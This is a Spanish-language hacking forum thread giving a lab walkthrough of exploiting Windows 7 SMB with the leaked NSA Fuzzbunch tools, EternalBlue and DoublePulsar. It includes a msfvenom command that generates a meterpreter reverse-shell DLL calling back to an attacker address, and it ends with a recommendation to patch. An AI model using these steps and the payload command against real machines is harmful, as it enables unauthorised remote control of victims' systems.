Hackeando como la nsa

Iniciado por Stuxnet, Abril 23, 2017, 04:41:28 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Abril 23, 2017, 04:41:28 PM Ultima modificación: Abril 23, 2017, 04:48:39 PM por Stuxnet

Buenas en este pequeño post, explotaremos una vulnerabilidad de Ejecución de codigo remoto en smb de windows descubierta por la nsa.
Desde hace unos días el grupo shadowbroker ha liberado nuevos exploits que afectan windows, SWIFT etc.

Las vulnerabilidades en windows son las siguientes:


Requerimientos:

Kali linux - Atacante -- 192.168.1.100
Windows XP - Atacante -- 192.168.1.102
Windows 7  - Victima  -- 192.168.1.101

Fuzzbunch ha sido el nombre de este framework con los multiples exploits de windows "El mestasploit de la nsa". Programado en python 2.6  y utiliza una versión antigua de pywin32.

Montando nuestro laboratorio.

En windows XP instalamos python 2.6 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta recomiendo moficar el path con la ruta de la carpeta de python2.6, la version antigua de pywin32 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y ahora descargamos el leak de exploits. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Nos enfocamos en la carpeta windows y procederemos a modificar Fuzzbunch.xml Linea 19 y linea 24 colocaremos la ruta de la carpeta de Resources en mi caso C:\nsa\shadowbroker\windows\Resources y la de Logs en la 24 C:\nsa\shadowbroker\windows\Logs.

Ahora vamos a editar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta comentando las lineas 26 y 72 o si no quieren comentar unicamente creen una carpeta con el nombre listeningposts dentro de la carpeta windows.

Bien ahora desde cmd nos ubicamos en la carpeta windows y ejecutamos: python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Primero pondremos la Ip victima.
Segundo pondremos la ip atacante windows xp
Tercero pondremos no en redireccion.



Bien despues precionamos enter, y procedemos a crear un proyecto nuevo con el nombre de underc0de.



Bien ahora vamos a usar el comando "use" para ver todo el arsenal de Fuzzbunch



Bien, usaremos el exploit "EternalBlue"



Bien, ahora procedemos a dejar todo por defecto, precionando enter.



Hasta llegar a esta parte donde vamos a cambiar la opcion 0 por 1



Bien ahora seguiremos precionando enter, y si todo salio bien.



Fuuuuuuuuuuuuck yea!!! Exploiting con exito.

Bien ahora usaremos otro genial función de Fuzzbunch DoublePulsar, para inyectar remotamente una DLL maliciosa, para eso la vamos a generar con msfvenom.

Código: text
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp --arch x86 -f dll LHOST=192.168.1.100 LPORT=4444 > /root/nsa.dll 


Nota: La dll se genero para la plataforma de windows x86

Ahora configuramos nuestro handler en metasploit.



Bien ahora copiamos nuestra dll a windows xp y ejecutamos lo siguiente



En mi caso dejare todo por defecto porque tengo la arquitectura x86
Bien ahora en este caso vamos a elejir la opcion 2 y luego nos pedira la ruta de nuestra dll.



Bien ahora, como siempre todo por defecto precionando enter, y si todo salio perfectamente les saldria esto



y en metasploit



fuck yeaaa!!! Sesion meterpreter sobre windows sin intervencion del usuario.

Recomendaciones.

Actualizar su sistema.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Dejo, por un lado el enlace al paper "original" que desde que salio en muchos sitios están sacando artículos prácticos sobre el tema, pero el paper me parece el más completo la verdad. Dejo también uno de Pablo González sobre como usarlo con Metasploit. Si sale algún otro articulo practico edito y lo añado.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No me base en ningun sitio desde hace tiempos que hice mis pruebas, date cuenta en la generaion del payload es totalmente diferente. y si comparas la hora de la publicación es totalmente diferente pero bueno xD por esto ya no publico nada.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

interesante articulo hermano, en unos momentos elaborare las pruebas de concepto en mi lab.
Saludos.

No he dicho en ningún momento que te basaras en ese paper, lo siento si no me explique bien. He dicho que muchos sitios están sacando artículos sobre explotación de Eternalblue y Doublepulsar y que el "original" me parecía más completo. Puse original entre comillas porque he visto tanto cosas bastante interesantes, que quizá ni sabían de la existencia del de Sheila a verdaderas copias descaradas.


Ya esta disponible el modulo en Metasploit xD, buen post


Saludos!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No he dicho en ningún momento que te basaras en ese paper, lo siento si no me explique bien. He dicho que muchos sitios están sacando artículos sobre explotación de Eternalblue y Doublepulsar y que el "original" me parecía más completo. Puse original entre comillas porque he visto tanto cosas bastante interesantes, que quizá ni sabían de la existencia del de Sheila a verdaderas copias descaradas.

Lo original es de este tipo que mis respetos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta :3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta